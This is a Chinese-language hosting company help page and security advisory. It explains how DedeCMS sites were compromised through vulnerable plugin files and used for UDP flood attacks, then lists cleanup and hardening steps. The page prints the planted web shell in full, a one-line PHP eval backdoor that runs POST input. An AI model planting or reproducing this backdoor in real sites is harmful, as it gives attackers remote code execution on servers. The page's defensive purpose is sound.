当前位置:帮助 > DedeCMS流量攻击解决方法
DedeCMS流量攻击解决方法

 

近期很多使用DedeCMS织梦系统的网站,被利用来进行流量攻击.
主要是利用plus目录下download.php和mytag_js.php页面存在的漏洞,上传木马文件90sec.php获得webshell,然后上传UDP发包代码,进行攻击
90sec.php文件内容:<?php eval($_POST[guige]);?>

 

解决方案:
1.(重点)及时更新程序最新补丁
2.删除plus下90sec.php,download.php,mytag_js.php和所有其他不需要使用的扩展插件
3.修改plus目录权限为555,即可读和可执行
4.删除data/cache目录下所有mytag-*.htm文件,清空data/tplcache下的缓存文件
5.清空数据表mytag和download
6.删除admin表中多余的管理员用户,修改管理员密码
7.删除plus,data,include,templets目录下所有用于流量攻击的可疑页面,如indefb.php,indray.php,indwef.php,cq.php等
8.重命名install/index.php.bak或者删除
9.(可选)禁用页面的ascii解码,修改include/dedesql.class.php,约598行,注释$v2 .= chr($arrs2[$i]);

 

附:织梦漏洞检测修复工具,重新检测以前存在的漏洞(使用前备份数据,以免误杀) 织梦漏洞检测修复工具
使用方法:
用FTP上传到网站同级目录
访问:xxx.com/dede_killer_gbk.php

感受恒汇  | 关于我们  | 公司资质 | 联系方式 | 合作伙伴 | 友情连接 | 资讯中心 | 网站地图
版权所有@广州恒汇网络通信有限公司 | ISO9001质量管理体系认证 | 广州恒汇网络通信有限公司旗下网站:恒汇通信 I-WIN 合讯通
全国统一服务热线:020-87275655 | 7*24小时值班热线:020-87275610
地址:广州市天河区黄埔大道中259号天润大厦北座804室